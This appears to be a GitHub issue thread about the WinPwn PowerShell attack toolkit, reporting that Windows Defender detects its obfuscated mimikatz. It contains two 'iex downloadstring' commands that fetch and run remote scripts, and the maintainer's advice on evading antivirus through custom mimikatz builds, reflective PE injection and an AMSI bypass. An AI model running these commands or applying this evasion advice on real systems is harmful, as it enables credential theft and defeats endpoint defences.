When running WinPwn in AMSI - iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/ObfusWinPwn.ps1')

or

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/Obfus_SecurePS_WinPwn.ps1')

Both ways after selecting option 16, Windows Defender picks up the mimikatz obfuscated version as malicious :-(

Tested on testbed Windows server 2016 Standard Edition x64 -

Windows Defender Details:
Antimalware Client Version: 4.18.2004.6
Engine Version: 1.1.17100.2
Antivirus definition: 1.317.173.0
Antispyware definition: 1.317.173.0
Network Inspection System Engine Version: 1.1.17100.2
Network Inspection System Definition Version: 1.317.173.0

Expected behaviour but i did not thought that it’s signature is caught that fast. Cloud detection is on or off?

Cloud Protection is "on" as to simulate a real life scenario.

I won’t re-obfuscate the loaded scripts each time they are flagged by a vendor that would be too much overhead. I will update the mimikatz Version from time to time with other string replacements. But it will most likely get flagged again after some days.

If you need an unflagged version i recommend compiling your own mimikatz version and embedding it in Invoke-ReflectivePEInjection.ps1 which also needs some modification for amsi Bypass afterwards. I got a gist for the mimikatz String replacement.